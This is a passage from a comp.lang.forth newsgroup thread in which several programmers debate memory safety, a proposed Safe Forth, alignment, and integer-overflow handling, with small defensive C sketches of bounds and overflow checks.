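        if (r != -1 && (r < 0 || (size_t)r > OUT_MAX || (size_t)r + 1 > len))
            failures++;
    }
    return failures;
}
```

    Deleting the `n > OUT_MAX` test lets random inputs produce lengths above 16. The harness counts those as failures, provided the resulting overrun of `out` does not crash the program first. This is the kind of case a programmer rarely tries by hand.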

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From minforth@21:1/5 to dxf on Mon Mar 4 11:06:05 2024
    dxf wrote:

    What do I use while developing a recursive function: ?STACK.

    Yes and no:

    Gforth 0.7.9_20200709
    Authors: Anton Ertl, Bernd Paysan, Jens Wilke et al., for more type `authors'
    Copyright © 2019 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>
    Gforth comes with ABSOLUTELY NO WARRANTY; for details type `license'
    Type `help' for basic help
    drop depth
    *the terminal*:1:1: error: Stack underflow
    drop<<< depth
    : TEST drop depth ; ok
    test <<<--- CRASH!!
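    The session suggests that the underflow is caught when the text interpreter checks the stack between words, but not inside the compiled definition. A check on every stack access can be sketched in C as follows. This assumes a hypothetical fixed-size stack: `DataStack`, `ds_pop` and `word_test` are illustrative names, and this is not how Gforth implements its stacks.

```c
#include <stdbool.h>
#include <stddef.h>

#define STACK_CELLS 64

/* Toy data stack: every push/pop checks the depth first, so DROP on an
   empty stack becomes a reportable error instead of a stray access. */
typedef struct {
    long cells[STACK_CELLS];
    size_t depth;
} DataStack;

bool ds_push(DataStack *s, long v)
{
    if (s->depth == STACK_CELLS)
        return false;                 /* overflow */
    s->cells[s->depth++] = v;
    return true;
}

bool ds_pop(DataStack *s, long *v)
{
    if (s->depth == 0)
        return false;                 /* underflow */
    *v = s->cells[--s->depth];
    return true;
}

/* Rough analogue of  : TEST drop depth ;  that reports underflow. */
bool word_test(DataStack *s)
{
    long ignored;
    if (!ds_pop(s, &ignored))
        return false;
    return ds_push(s, (long)s->depth);
}
```

    The cost is a compare and a branch on every push and pop.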

  • From Krishna Myneni@21:1/5 to minforth on Mon Mar 4 07:06:38 2024
    On 3/4/24 01:52, minforth wrote:
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding,
    primarily for my own needs. My expectation is that the demand for
    Forth systems which don't address safety concerns will rapidly drop to
    zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

    The trend has been to go to "memory-safe" languages. There are many
    instances in which simple run-time type checking for addresses has
    saved me considerable debugging time -- usually just stack
    order is incorrect, but the error can manifest in more complex ways as well.
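    Run-time address checking of this kind can be sketched by tagging every stack cell with the kind of value it holds. The layout and the names `Cell`, `Tag` and `checked_fetch` are assumptions made for illustration. They do not describe the author's system.

```c
#include <stdbool.h>

typedef enum { TAG_NUMBER, TAG_ADDRESS } Tag;

/* A stack cell that remembers what kind of value it holds. */
typedef struct {
    Tag tag;
    union { long n; long *p; } u;
} Cell;

Cell make_number(long n)   { Cell c = {TAG_NUMBER};  c.u.n = n; return c; }
Cell make_address(long *p) { Cell c = {TAG_ADDRESS}; c.u.p = p; return c; }

/* Checked @ (fetch): only a cell tagged as an address may be dereferenced. */
bool checked_fetch(Cell addr, long *out)
{
    if (addr.tag != TAG_ADDRESS)
        return false;
    *out = *addr.u.p;
    return true;
}
```

    Suppose two items are passed in the wrong order. A number then arrives where an address was expected, and the fetch reports an error instead of reading arbitrary memory.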

    I don't have any particular insight into the trends other than following
    the news. I think there will be even greater pressure going forward to
    use memory-safe languages for internet-facing applications. The shift in academia towards those languages appears to have already happened. My daughter's first-year CS class uses Python.

    --
    Krishna

  • From minforth@21:1/5 to Krishna Myneni on Mon Mar 4 14:20:09 2024
    Krishna Myneni wrote:

    On 3/4/24 01:52, minforth wrote:
    Krishna Myneni wrote:

    On 3/3/24 10:08, minforth wrote:
    OTOH I doubt that there is any demand for a paranoia Forth
    with safety belts and suspenders and alarm whistles.

    Perhaps not, but I wrote my Forth system to provide some hand-holding,
    primarily for my own needs. My expectation is that the demand for
    Forth systems which don't address safety concerns will rapidly drop to
    zero.

    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site). I've already wondered how much convincing
    had to be done for NASA not to disqualify Forth.

    The trend has been to go to "memory-safe" languages. There are many
    instances in which simple run-time type checking for addresses has
    saved me considerable debugging time -- usually just stack
    order is incorrect, but the error can manifest in more complex ways as well.

    I don't have any particular insight into the trends other than following
    the news. I think there will be even greater pressure going forward to
    use memory-safe languages for internet facing applications. The shift in academia towards those languages appears to have already happened.

    This is why WebAssembly is on the rise. Many languages can already be
    compiled to Wasm. See
    https://webassembly.org/docs/security/

    However, I found only a few wasm-based Forths on the net.

  • From Paul Rubin@21:1/5 to dxf on Mon Mar 4 12:23:04 2024
    dxf <dxforth@gmail.com> writes:
    Has it paid off - by which I mean completed apps that out of the blue
    access invalid memory?

    It could be that catching more of those errors during development means
    fewer make it out to deployment.

    I'm curious as to what exactly is behind the high rate of 'memory
    errors' that govt et al is reporting because in my limited experience programming in Forth, I'm just not seeing any.

    The programs with the memory errors are likely more complicated than
    typical Forth programs, deal with more maliciously crafted inputs, and
    make heavier use of dynamic memory allocation than small embedded
    programs are likely to. My own Forth experience is even more limited,
    but in it, I haven't even used arrays very much, especially for
    user-supplied data.

  • From Paul Rubin@21:1/5 to minforth on Mon Mar 4 12:17:12 2024
    minforth@gmx.net (minforth) writes:
    IIRC there have been a few Forth applications at NASA and for astronomy
    (e.g. see Forth Inc. web site).

    I wonder if any of those applications were written in the current
    century.

  • From Tristan Wibberley@21:1/5 to Anton Ertl on Mon Mar 4 23:03:55 2024
    On 01/03/2024 18:02, Anton Ertl wrote:
    mhx@iae.nl (mhx) writes:
    What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.

    I'm not very familiar with Forth yet; does this refer to writing to a
    machine-addressed location? If so, plenty of computers have alignment requirements, so a DoS can be introduced by the above action.

    Also, if you write a byte to a float location, a variety of problems can
    be introduced including running trap callbacks that were insufficiently
    tested for the new program state, etc, killing the process and running
    restart sequences where less volatile state can now be in an unusual
    condition and new side-effects induced, and so on.

    Memory safety means maintaining invariant relations wrt. each memory
    location.

  • From Paul Rubin@21:1/5 to dxf on Mon Mar 4 21:17:21 2024
    dxf <dxforth@gmail.com> writes:
    Yes but asking the system to find errors isn't looking - it's covering
    one's butt.

    If the implementer doesn't find them and the system doesn't find them,
    that leaves them for the attackers to find. Wasn't that what you were
    asking about? We are learning that the best way to prevent attackers
    from finding such errors is to use tools (e.g. languages) that prevent
    those errors from occurring in the first place.

  • From Tristan Wibberley@21:1/5 to Anton Ertl on Tue Mar 5 07:58:20 2024
    On 05/03/2024 06:35, Anton Ertl wrote:
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:

    ...

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors. ...

    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

  • From Anton Ertl@21:1/5 to Tristan Wibberley on Tue Mar 5 06:35:40 2024
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:
    On 01/03/2024 18:02, Anton Ertl wrote:
    mhx@iae.nl (mhx) writes:
    What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.

    I'm not very familiar with forth yet, does this refer to writing to a
    machine addressed location?

    Yes.

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors, and even on hardware that
    has alignment requirements (like our 21264B machine from 2000), the OS
    (Linux) emulates the behaviour of computers without these requirements
    when the program performs an unaligned access, and I had to write a
    special program to get signals for unaligned accesses <https://www.complang.tuwien.ac.at/anton/uace.c>. And while the Linux
    command setarch can turn on various compatibility features for old
    programs, such as turning off ASLR, it does not include a feature for
    making unaligned accesses trap on the appropriate hardware.

    In any case, if we want to avoid unaligned FP accesses, one can design
    a memory-safe Forth dialect that prevents unaligned FP accesses without
    preventing accesses to the same memory both as bytes and as FP values.
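    Such a dialect rule can be sketched as a store word that makes two separate checks. The first is a bounds check, which memory safety requires. The second is an alignment check, which is only a policy choice of the dialect. This is a minimal C sketch that assumes C11 `alignof`. `checked_fstore` and the byte-region model are hypothetical and are not Gforth's interface.

```c
#include <stdalign.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a double at byte offset `off` of a byte region of length `len`.
   Rule 1 (memory safety): all sizeof(double) bytes lie inside the region.
   Rule 2 (dialect policy): the target address is aligned for double.
   Byte-wise access to the same region remains allowed. */
bool checked_fstore(unsigned char *region, size_t len, size_t off, double x)
{
    if (off > len || len - off < sizeof x)
        return false;                                /* out of bounds */
    if ((uintptr_t)(region + off) % alignof(double) != 0)
        return false;                                /* unaligned FP store */
    memcpy(region + off, &x, sizeof x);
    return true;
}
```

    Because the copy goes through `memcpy`, C itself imposes no alignment requirement here. The second test exists only to enforce the dialect rule, and the same bytes can still be read back one by one.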

    However, despite all that, my plan is to design Safe Forth in a way
    where the commonly-used words do not support such kinds of accesses,
    because the result will make most programming tasks easier. For
    specialized uses there may be words that just treat the memory as
    bytes, though.

    a DoS can be introduced by the above action.

    DoS and more serious vulnerabilities can be introduced in lots of ways
    in memory-safe programming languages, whether some mechanism prevents
    writing floats to a byte location or not.

    However, I should refine my sentence above to: "That's not a
    memory-safety problem ...".

    Also, if you write a byte to a float location, a variety of problems can
    be introduced including running trap callbacks that were insufficiently
    tested for the new program state, etc, killing the process and running
    restart sequences where less volatile state can now be in an unusual
    condition and new side-effects induced, and so on.

    Memory safety does not guarantee bug-freedom.

    However, what you write appears to be a case of "Bedenkentraeger"
    (German for someone who habitually raises objections), imagining all
    kinds of possible or impossible problems in order to argue against
    something. In the present case, impossible problems:

    In Gforth no floating-point operation traps, and I intend to keep that behaviour for Safe Forth.

    There is also no way to write "trap callbacks". If there was, and a
    programmer used it, and it was insufficiently tested, the problem
    would be that the code was insufficiently tested, not in writing the
    byte to an address where later an FP value is read from.

    Because there is no trap and no trap callback, the process is not
    killed, and no restart sequence is run. If it was, the condition of process-surviving state would be something that would have to be made
    safe whether the system prevents accessing bytes and FP values at the
    same addresses or not.

    Memory safety means maintaining invariant relations wrt. each memory
    location.

    So?

    - anton

  • From minforth@21:1/5 to Tristan Wibberley on Tue Mar 5 14:03:46 2024
    Tristan Wibberley wrote:

    On 05/03/2024 06:35, Anton Ertl wrote:
    Tristan Wibberley <tristan.wibberley+netnews2@alumni.manchester.ac.uk> writes:

    ....

    If so, plenty of computers have alignment
    requirements,

    In general-purpose computers, that used to be the case in the 1990s,
    but nowadays it is no longer the case. We have to use really old
    hardware to test against alignment errors. ...

    Or special purpose computers that are not mass marketed, but I wasn't
    aware they'd fixed all the public market computers. Thanks for the info.

    You are still in for some nasty surprises with "public market" ARM CPUs,
    for example:
    https://developer.arm.com/documentation/den0013/d/Porting/Alignment

  • From Paul Rubin@21:1/5 to dxf on Tue Mar 5 10:03:15 2024
    dxf <dxforth@gmail.com> writes:
    AFAIK hacks are opportunistic i.e. could not reasonably be foreseen.
    Such "errors" are forgivable. Not so, programmers who either don't
    know where something might overflow, or knowing, fail to address it.

    Humans make errors. The world's smartest mathematicians have published
    proofs with mistakes. Today, there is a community that likes to
    machine-check math proofs to make sure they are sound. It's the same
    thing with memory-safe languages. We don't have practical ways to make
    sure programs are free of all errors, but we can make sure they are free
    of some common and significant types of them.

  • From Paul Rubin@21:1/5 to Hans Bezemer on Tue Mar 5 10:40:09 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    If you think you will revive Forth by jumping on that Rust bandwagon,
    I think you're wrong.

    Probably true, Forth users want something different than what Rust aims
    to supply.

    First and foremost, because I think Rust is the wrong idea. It's been
    tried before - Ada, Pascal, Java - in some sense: BASIC.

    BASIC's heyday was before my time, but it was very popular in a certain
    crowd. Java was extremely successful in industry and I think it was at
    the top of TIOBE for a while (it is #4 now). #1 is currently Python
    which can be seen as a successor to BASIC. Pascal was intentionally
    limited (it was intended as an instructional language) and yet it had
    its own era of popularity because of Turbo Pascal and the P-system.

    Ada was overcomplicated, but I think it also didn't gain traction
    because the early Ada compilers were slow and expensive. If GNAT had
    been available from the beginning, Ada would have gotten more use, imho.

    Good programmers exist because they are good programmers. Bad programs
    exist because of bad programmers.

    The best programmers I know have released code with memory errors, so at
    a certain point you have to stop blaming the human for being less
    accurate than a machine.


    "Ada will not meet its major objective... for it is so complicated
    that it defies the unambiguous definition that is essential for these purposes.

    It's not particularly more complicated than C++ as far as I can tell,
    and C++ is currently #3 on TIOBE.

    "...for it is so complicated...". That is the very definition of Rust.

    All the time you're spending getting your code to compile, you're not creating programs.

    Would you say the same of time you spend fixing bugs that you find
    during testing?

    I'd say that's the reverse of productivity. The higher the
    abstraction, the more difficult it is to understand - let alone to
    teach.

    Picking the right level of abstraction to handle a problem is an
    important skill in programming just like it is in math. We spend a lot
    of time studying abstractions in math because they are useful. That
    turns out to be true in programming as well.

    Lifetimes? Borrowing? Are you kidding me?

    This is just the language handling and checking an abstraction that
    people have been applying manually since long before Rust. If you look at the
    CPython implementation, it does memory management by reference counting,
    and it constantly uses the ideas of borrowed references internally.
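    The manual discipline referred to here can be sketched in a few lines of C. The names are hypothetical and deliberately simplified, and CPython's real API differs. The point is that only a comment distinguishes an owned return value from a borrowed one.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical reference-counted object; not the CPython API. */
typedef struct {
    int refcount;
    int payload;
} Obj;

/* Returns a new (owned) reference, or NULL if allocation fails. */
Obj *obj_new(int payload)
{
    Obj *o = malloc(sizeof *o);
    if (o != NULL) {
        o->refcount = 1;
        o->payload = payload;
    }
    return o;
}

void obj_incref(Obj *o) { o->refcount++; }

/* Gives up one owned reference; the last one frees the object. */
void obj_decref(Obj *o)
{
    if (--o->refcount == 0)
        free(o);
}

typedef struct {
    Obj *items[4];
    int n;
} List;

/* Returns a BORROWED reference: valid only while the list still holds its
   own; a caller that wants to keep the object must call obj_incref. */
Obj *list_get(const List *l, int i)
{
    if (i < 0 || i >= l->n)
        return NULL;
    return l->items[i];
}
```

    If a caller forgets `obj_incref`, the code still compiles and only fails later, after the list drops its reference. A borrow checker enforces this kind of rule at compile time.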

    I would say today though, most application programmers don't need Rust.
    They will be more productive with garbage collected languages, at the
    expense of some machine resources. Rust is for when those resources
    can't be spared.

    So, safety, yes. I like that very much. I ventured into that very
    early and I never regretted it. But apart from some basic checks it
    should stop at the point where I have to convince a compiler that I
    know what I'm doing.

    I see it the other way. If the compiler can find every error in my
    program of type X, then simply fixing the program until the compiler
    accepts it means I get a program that is free of that type of error.
    That increases my confidence in the program. The trade-off is that such features can make the language and the compiler harder to use. A big
    part of research in languages is widening the classes of errors that the compiler can check without the language becoming too difficult.

  • From minforth@21:1/5 to Hans Bezemer on Tue Mar 5 18:32:03 2024
    Hans Bezemer wrote:
    I tend to trust my Forth programs a lot more than my C ones

    Maybe you're a lousy, careless C programmer? (pun intended ;-))

    But I agree with you that the world doesn't need a Safe Forth.

    Still, everyone has their favourite baby (like you have your 4th)
    and you can still learn a few things while exploring additional
    security features and enjoy it for the intellectual exercise, as
    Anton seems to be doing with gforth.

    By the way, I don't want to go off on a tangent here. I use
    security features myself (not in MinForth though), because the
    cost of repairing faulty devices in remote locations is too high
    to afford carelessness.

    The solution is a separate DSL (on top of a Forth nucleus) that
    does not allow any direct memory access. Very simple sandboxing.
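    One way to read this is that the nucleus owns all memory, and DSL words accept only indices that are checked against what the script has been given. The sketch below works under that assumption. The arena layout and all names are hypothetical and do not describe minforth's design.

```c
#include <stdbool.h>
#include <stddef.h>

#define ARENA_CELLS 256

/* Scripts never see raw addresses: they name cells by index into an
   arena owned by the nucleus, and every access is range-checked. */
typedef struct {
    long cells[ARENA_CELLS];
    size_t used;                    /* cells handed out so far */
} Arena;

/* Allocate n cells; returns the starting index, or -1 if full. */
long arena_alloc(Arena *a, size_t n)
{
    if (n > ARENA_CELLS - a->used)
        return -1;
    long h = (long)a->used;
    a->used += n;
    return h;
}

bool dsl_store(Arena *a, long idx, long v)
{
    if (idx < 0 || (size_t)idx >= a->used)
        return false;               /* outside anything the script owns */
    a->cells[idx] = v;
    return true;
}

bool dsl_fetch(const Arena *a, long idx, long *v)
{
    if (idx < 0 || (size_t)idx >= a->used)
        return false;
    *v = a->cells[idx];
    return true;
}
```

    A mistaken index can then corrupt at most the script's own cells, never the nucleus.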

  • From Paul Rubin@21:1/5 to dxf on Tue Mar 5 16:54:24 2024
    dxf <dxforth@gmail.com> writes:
    At no time during its writing did I consider hackers or inept users. Responsible programming was all.

    Very nice. Back in the 1980s all of us did that. Then something called
    the internet came along, as did computerized banking and other systems
    which attracted highly competent malicious and/or financially motivated attackers. At that point, writing bulletproof code became not only much harder, but also vitally important. You now must ensure not only that
    your program can do what you intended, but that it can't do what you
    didn't intend. Bruce Schneier[1] wrote about security engineering:

    In many ways this is similar to safety engineering. ... But safety
    engineering involves making sure things do not fail in the presence
    of random faults: it’s about programming Murphy’s computer, if you
    will. Security engineering involves making sure things do not fail
    in the presence of an intelligent and malicious adversary who forces
    faults at precisely the worst time and in precisely the worst
    way. Security engineering involves programming Satan’s computer.
    And Satan’s computer is hard to test.

    [1] https://www.schneier.com/essays/archives/1999/11/why_computers_are_in.html

    So sure, if you're claiming that 1980s programming didn't benefit from
    memory safe languages, maybe you're right. Those of us who have to
    program in the 21st century, though, need all the help we can get.

  • From minforth@21:1/5 to dxf on Wed Mar 6 08:23:53 2024
    dxf wrote:

    On 6/03/2024 11:54 am, Paul Rubin wrote:
    ...
    Those of us who have to
    program in the 21st century, though, need all the help we can get.

    "There is no hardware protection. Memory protection can be provided by
    the access computer. But I prefer software that is correct by design." - C.M.

    Confucius said:
    Use program that treats integer wraparound as good feature and find yourself in big heap of dung

  • From minforth@21:1/5 to dxf on Wed Mar 6 09:32:29 2024
    dxf wrote:

    On 6/03/2024 7:23 pm, minforth wrote:
    dxf wrote:

    On 6/03/2024 11:54 am, Paul Rubin wrote:
    ... Those of us who have to
    program in the 21st century, though, need all the help we can get.

    "There is no hardware protection. Memory protection can be provided by
     the access computer. But I prefer software that is correct by design." - C.M.

    Confucius said:
    Use program that treats integer wraparound as good feature and find yourself in big heap of dung

    A 'memory-safe' system won't detect that. What now?

    Wrong separation. They are related: https://www.securecoding.com/blog/integer-overflow-attack-and-prevention/
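    A common way for the two to meet is an overflowing size calculation. The product wraps to a small number, a small block is allocated, and later writes run past its end. This is a minimal C sketch of the guard, and the function name `alloc_array` is hypothetical.

```c
#include <stdint.h>
#include <stdlib.h>

/* Allocate `count` elements of `size` bytes each. A naive
   malloc(count * size) can wrap around to a small value, after which
   writes the caller believes are in bounds overrun the block. */
void *alloc_array(size_t count, size_t size)
{
    if (size != 0 && count > SIZE_MAX / size)
        return NULL;                /* the product would wrap */
    return malloc(count * size);
}
```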

    I've been bitten in the past. Among other things, I now often use
    range values, unknown to standard Forth, e.g. as array indices.
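    Standard Forth has no such type. The C sketch below illustrates the idea using an index that carries its own exclusive upper limit. The `Index` type and its functions are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* An index that knows its valid range 0 .. limit-1. */
typedef struct {
    size_t limit;
    size_t value;
} Index;

bool index_make(size_t limit, size_t v, Index *out)
{
    if (v >= limit)
        return false;
    out->limit = limit;
    out->value = v;
    return true;
}

/* Move by delta; refuse (leaving the index unchanged) rather than wrap
   around or step outside the range. */
bool index_add(Index *ix, long delta)
{
    if (delta >= 0) {
        if ((size_t)delta >= ix->limit - ix->value)
            return false;
        ix->value += (size_t)delta;
    } else {
        /* magnitude of delta, computed without negating LONG_MIN */
        size_t mag = (size_t)(-(delta + 1)) + 1;
        if (mag > ix->value)
            return false;
        ix->value -= mag;
    }
    return true;
}
```

    Every operation refuses to leave 0..limit-1, so an index created for a 50-element array can never be moved to 60.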

  • From Paul Rubin@21:1/5 to dxf on Thu Mar 7 18:25:57 2024
    dxf <dxforth@gmail.com> writes:
    For example it's my experience one can input an out-of-range integer
    into C and Forth compilers and neither will notice.... Programmers
    too and I'm no exception.

    These days I'd call C and Forth both niche languages, the niche being
    low level systems code and small embedded programs. #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That
    slows arithmetic down but it mostly eliminates the overflow problem.

    IMHO that is what all high level languages should do by default. Of
    course native machine types and low level languages (C, Forth, Rust,
    Ada, etc.) should stay available for cases where you want to or have to
    program closer to the hardware.

  • From Ron AARON@21:1/5 to Paul Rubin on Fri Mar 8 07:10:55 2024
    On 08/03/2024 4:25, Paul Rubin wrote:
    dxf <dxforth@gmail.com> writes:
    For example it's my experience one can input an out-of-range integer
    into C and Forth compilers and neither will notice.... Programmers
    too and I'm no exception.

    These days I'd call C and Forth both niche languages, the niche being
    low level systems code and small embedded programs. #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That slows arithmetic down but it mostly eliminates the overflow problem.

    IMHO that is what all high level languages should do by default. Of
    course native machine types and low level languages (C, Forth, Rust,
    Ada, etc.) should stay available for cases where you want to or have to program closer to the hardware.

    Just as an aside, 8th also does that. Numbers automatically grow as
    needed. Yes, it's slower than native integers/floats... but it's very convenient, and most of the time nobody notices the difference in speed.

  • From Anton Ertl@21:1/5 to Paul Rubin on Sat Mar 9 11:30:56 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    #1 on TIOBE is
    Python, which uses arbitrary precision as the native integer type. That
    slows arithmetic down but it mostly eliminates the overflow problem.

    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very predictable.
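    In C, GCC and Clang expose this pattern through the `__builtin_add_overflow` and `__builtin_mul_overflow` built-ins. On AMD64 these usually compile to the arithmetic instruction followed by a branch on the overflow flag. The sketch assumes one of those compilers. Where a function returns false, a real implementation would switch to its bignum path, which is omitted here.

```c
#include <stdbool.h>

/* Fast path for small integers: operate, then branch on overflow.
   Returns false when the result does not fit in a long. */
bool small_add(long a, long b, long *sum)
{
    return !__builtin_add_overflow(a, b, sum);
}

bool small_mul(long a, long b, long *prod)
{
    return !__builtin_mul_overflow(a, b, prod);
}
```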

    Python (particularly CPython), however, does not seem to have gone for efficient implementation; I don't know what they do for arbitrarily
    large integers, but the inner interpreter was pretty monstrous last I
    looked.

    I have looked at the implementation of arbitrarily large integers in
    OpenJDK (could be better) and in the BC engine of Racket (could also
    be better, but the BC engine is on the back burner). They have a
    JIT compiler as the main engine, but I did not find out how it
    implements arbitrarily large integers.

    But integer overflow is orthogonal to memory safety.

    There are many people who claim that wrapping behaviour for integer
    overflow is a problem. Java defines the basic types int and long to
    perform wraparound on overflow, and while Java has its own share of vulnerabilities (most prominently Log4Shell), I am not aware of one
    where the wraparound behaviour was involved (but then, I have not
    looked).

    - anton

  • From minforth@21:1/5 to All on Sat Mar 9 12:17:08 2024
    Years ago we had a crash when using old archived data files
    in a more recent system. The old file format relied on a
    maximum 64k (16-bit) index size, while the evaluating system assumed
    24-bit indices, and so the index overflowed the allocated memory space.
    In hindsight a trivial case, but it took a while to track it down.

  • From Anton Ertl@21:1/5 to minforth on Sat Mar 9 17:27:45 2024
    minforth@gmx.net (minforth) writes:
    Years ago we had a crash with using old archived data files
    in a more recent system. The old file format relied on having
    max 64k (16bit) index size, while the evaluating system assumed
    24bit, and so the index overflowed the allocated memory space.

    Sounds like it would be caught by a memory-safe language, no integer
    overflow detection necessary; and it's actually not a case of integer
    overflow.

    - anton

  • From Anton Ertl@21:1/5 to Spiros Bousbouras on Sat Mar 9 17:01:30 2024
    Spiros Bousbouras <spibou@gmail.com> writes:
    On Sat, 09 Mar 2024 11:30:56 GMT
    anton@mips.complang.tuwien.ac.at (Anton Ertl) wrote:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    Don't you also need to first check that both arguments are small
    integers?

    Yes, at some point. If the same value is used several times in a
    piece of code, there is only one check needed before the first use; if
    a subsequent use is not dominated by the first use, you only need
    another check on those paths that bypass the first check, as in
    partial redundancy elimination, resulting in one check on any path
    that reaches a use of the value.
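A minimal C sketch of the "check the tag once, then add and jo" scheme, assuming a hypothetical tagging convention where a small integer n is stored as 2n+1 (low bit set) and any other word would point to a boxed bignum. The overflow test uses the GCC/Clang builtin `__builtin_add_overflow`, which on AMD64 typically compiles to an add followed by a conditional jump on overflow.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical tagging: a small integer n is stored as 2n+1. */
typedef intptr_t value;

static bool is_small(value v) { return (v & 1) != 0; }
static value make_small(intptr_t n) { return (value)(((uintptr_t)n << 1) | 1u); }
/* Right shift of a negative value is arithmetic on GCC/Clang. */
static intptr_t small_val(value v) { return v >> 1; }

/* Returns false when the slow (bignum) path is needed: an operand is
   not a small integer, or the sum does not fit in a small integer. */
static bool add_small(value a, value b, value *result)
{
    if (!is_small(a) || !is_small(b))     /* one tag check per operand */
        return false;
    value sum;
    /* (2x+1) + 2y = 2(x+y)+1, so add the raw words minus one tag bit. */
    if (__builtin_add_overflow(a, b - 1, &sum))   /* add + jo on AMD64 */
        return false;
    *result = sum;
    return true;
}
```

If several operations use the same values, the `is_small` tests can be hoisted to the first use, which is the redundancy elimination described above.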

    - anton
  • From Paul Rubin@21:1/5 to Anton Ertl on Sat Mar 9 20:18:34 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very predictable.

    It might be worse for RISC V. Either way though, you need either boxed integers or tag bits.

    Python (particularly CPython), however, does not seem to have gone for efficient implementation;

    CPython's implementation is not very good, but there is or was a gmpy
    module that let you use GMP for fast bignum arithmetic. I remember in
    the Python 2.2 era it was 3x or 4x faster than CPython bignums. But, I
    think it has since fallen into non-maintenance and bit rot.

    I don't know what they do for arbitrarily large integers, but the
    inner interpreter was pretty monstrous last I looked.

    CPython has a fairly straightforward bytecode interpreter.

    But integer overflow is orthogonal to memory safety.
    There are many people who claim that wrapping behaviour for integer
    overflow is a problem.

    It has a problem because it's wrong! Of course it's deterministic
    instead of being UB, and that makes some people feel better, but making
    2+2=5 is also deterministic yet wrong. At least with UB, the
    implementation can have a setting to do the right thing and trap the
    overflow, instead of being mandated to quietly give wrong results.

    Imagine x is a 50 element array and for whatever reason you try to
    update x[60]. So the implementation might clobber 10 elements past the
    end of the array (bad), or it can signal an error (the only thing that
    makes sense), or in a feat of Java-like brilliance it might alias x[60]
    to x[10] since 60 is 10 mod 50. That seems completely silly to me as a
    default behaviour. Integer overflow wraparound is more of the same.

    Yes, there are situations like circular buffers where you might want that wraparound, just like there are situations like hash functions where you
    want machine word wraparound, but those are special enough to call for
    explicit declarations.
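In C, that kind of explicit opt-in can be expressed by choosing unsigned fixed-width types, whose arithmetic is defined to wrap modulo 2^N, or by writing the modulus out. A minimal sketch of the two cases mentioned: the 32-bit FNV-1a hash (a standard hash that relies on wrapping multiplication) and a circular-buffer index with an explicit modulus. The function names are illustrative only.

```c
#include <stddef.h>
#include <stdint.h>

/* 32-bit FNV-1a: the multiply is meant to wrap modulo 2^32,
   and uint32_t arithmetic guarantees exactly that in C. */
static uint32_t fnv1a32(const char *s)
{
    uint32_t h = 2166136261u;              /* FNV offset basis */
    for (; *s; s++) {
        h ^= (unsigned char)*s;
        h *= 16777619u;                    /* FNV prime */
    }
    return h;
}

/* Circular-buffer index: the wraparound modulus is the buffer size,
   stated explicitly rather than inherited from the machine word. */
static size_t ring_next(size_t i, size_t size)
{
    return (i + 1) % size;
}
```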


    Java defines the basic types int and long to perform wraparound on
    overflow,

    Yes, a mistake IMHO. The one language that I know of that gets this
    right is Ada. The default behavior is signal on overflow, but you can
    specify wraparound (with any modulus you wish) if that is what your
    application wants. If your modulus happens to be 2**32 or whatever, the compiler recognizes this and generates the efficient machine code you
    would expect.

  • From minforth@21:1/5 to All on Sun Mar 10 08:15:48 2024
    Excellent summary.

  • From Anton Ertl@21:1/5 to Paul Rubin on Sun Mar 10 08:29:13 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    I don't know what they do for arbitrarily large integers, but the
    inner interpreter was pretty monstrous last I looked.

    CPython has a fairly straightforward bytecode interpreter.

    When I last looked, the inner interpreter dispatch was huge, covering
    the screen (maybe 50-100 lines), with lots of special cases for
    various things.

    But integer overflow is orthogonal to memory safety.
    There are many people who claim that wrapping behaviour for integer
    overflow is a problem.

    It has a problem because it's wrong! Of course it's deterministic
    instead of being UB, and that makes some people feel better, but making
    2+2=5 is also deterministic yet wrong.

    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    Imagine x is a 50 element array and for whatever reason you try to
    update x[60].

    That is a memory-safety issue, and what Java gives you in that case is
